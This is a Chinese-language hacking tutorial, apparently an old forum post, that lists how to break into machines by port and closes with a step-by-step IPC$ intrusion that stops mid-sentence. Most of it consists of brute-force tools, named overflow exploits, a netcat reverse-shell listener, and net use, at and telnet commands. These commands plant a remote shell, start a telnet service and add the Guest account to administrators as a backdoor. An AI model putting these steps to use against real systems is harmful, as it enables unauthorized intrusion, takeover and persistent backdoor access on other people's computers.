怎么對端口進(jìn)行攻擊？

1. 1433端口入侵 scanport.exe 查有1433的機(jī)器 SQLScanPas*.**e 進(jìn)行字典暴破（字典是關(guān)鍵） 最后 SQLTool*.**e入侵 對sql的sp2及以下的系統(tǒng)，可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本機(jī)端口 sqlhelloF.exe 入侵ip 1433 本機(jī)ip 本機(jī)端口 （以上反向的，測試成功） sqlhelloz.exe 入侵ip 1433 （這個(gè)是正向連接）

2. 4899端口入侵 用4899過濾器.exe，掃描空口令的機(jī)器

3. 3899的入侵 對很早的機(jī)器，可以試試3389的溢出(win3389ex.exe) 對2000的機(jī)器，可以試試字典暴破。(tscrack.exe)

4. 80入侵 對sp3以前的機(jī)器，可以用webdav入侵； 對bbs論壇，可以試試上傳漏洞（upfile.exe或dvup_delphi.exe） 可以利用SQL進(jìn)行注入。（啊D的注入軟件）。

5. serv-u入侵(21端口） 對5. 004及以下系統(tǒng)，可用溢出入侵。（serv5004.exe） 對5.1.0.0及以下系統(tǒng)，可用本地提升權(quán)限。（servlocal.exe） 對serv-u的MD5加密密碼，可以用字典暴破。（crack.vbs） 輸入一個(gè)被serv-u加密的密碼（34位長），通過與字典檔（dict.txt）的比較，得到密碼

6. 554端口 用real554.exe入侵。

7. 6129端口 用DameWare6129.exe入侵。

8. 系統(tǒng)漏洞 利用135、445端口，用ms03026、ms03039、ms03049、ms04011漏洞， 進(jìn)行溢出入侵。

9. 3127等端口 可以利用doom病毒開的端口，用nodoom.exe入侵。（可用mydoomscan.exe查）。

10. 其他入侵 利用shanlu的入侵軟件入侵（WINNTAutoAttack.exe）。 經(jīng)典IPC$入侵 1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators" 這是用"流光"掃到的用戶名是administrators，密碼為"空"的IP地址(氣好到家如果是打算攻擊的話，就可以用這樣的命令來與127.0.0.1建立一個(gè)連 接，因?yàn)槊艽a為"空"，所以第一個(gè)引號(hào)處就不用輸入，后面一個(gè)雙引號(hào)里的是用戶名 ，輸入administrators，命令即可成功完成。 2. C:\>copy srv.exe \\127.0.0.1\admin$ 先復(fù)制srv.exe上去，在流光的Tools目錄下就有（這里的$是指admin用戶的 c:\WINNT\system32\，大家還可以使用c$、d$，意思是C盤與D盤，這看你要復(fù)制到什么地方去了）。 3. C:\>net time \\127.0.0.1 查查時(shí)間，發(fā)現(xiàn)127.0.0.1 的當(dāng)前時(shí)間是 2002/3/19 上午 11:00，命令成功完成。 4. C:\>at \\127.0.0.1 11:05 srv.exe 用at命令啟動(dòng)srv.exe吧（這里設(shè)置的時(shí)間要比主機(jī)時(shí)間快，不然你怎么啟動(dòng)啊. 5. C:\>net time \\127.0.0.1 再查查到時(shí)間沒有？如果127.0.0.1 的當(dāng)前時(shí)間是 2002/3/19 上午 11:05，那就準(zhǔn)備 開始下面的命令。 6. C:\>Telnet 127.0.0.1 99 這里會(huì)用到Telnet命令吧，注意端口是99。Telnet默認(rèn)的是23端口，但是我們使用的 是SRV在對方計(jì)算機(jī)中為我們建立一個(gè)99端口的Shell。 雖然我們可以Telnet上去了，但是SRV是一次性的，下次登錄還要再激活！所以我們打 算建立一個(gè)Telnet服務(wù)！這就要用到ntlm了 7.C:\>copy ntlm.exe \\127.0.0.1\admin$ 用Copy命令把ntlm.exe上傳到主機(jī)上（ntlm.exe也是在《流光》的Tools目錄中）。 8. C:\WINNT\system32>ntlm 輸入ntlm啟動(dòng)（這里的C:\WINNT\system32>指的是對方計(jì)算機(jī)，運(yùn)行ntlm其實(shí)是讓這 個(gè)程序在對方計(jì)算機(jī)上運(yùn)行）。當(dāng)出現(xiàn)"DONE"的時(shí)候，就說明已經(jīng)啟動(dòng)正常。然后使 用"net start telnet"來開啟Telnet服務(wù)！ 9. Telnet 127.0.0.1，接著輸入用戶名與密碼就進(jìn)入對方了，操作就像在DOS上操作 一樣簡單！(然后你想做什么?想做什么就做什么吧,哈哈) 為了以防萬一,我們再把guest激活加到管理組 10. C:\>net user guest /active:yes 將對方的Guest用戶激活 11. C:\>net user guest 1234 將Guest的密碼改為1234,或者你要設(shè)定的密碼 12. C:\>net localgroup administrators guest /add 將Guest變?yōu)锳dministrator^_^(如果管理員密碼更改，guest帳號(hào)沒改變的話，下次我 們可以用guest再次訪問這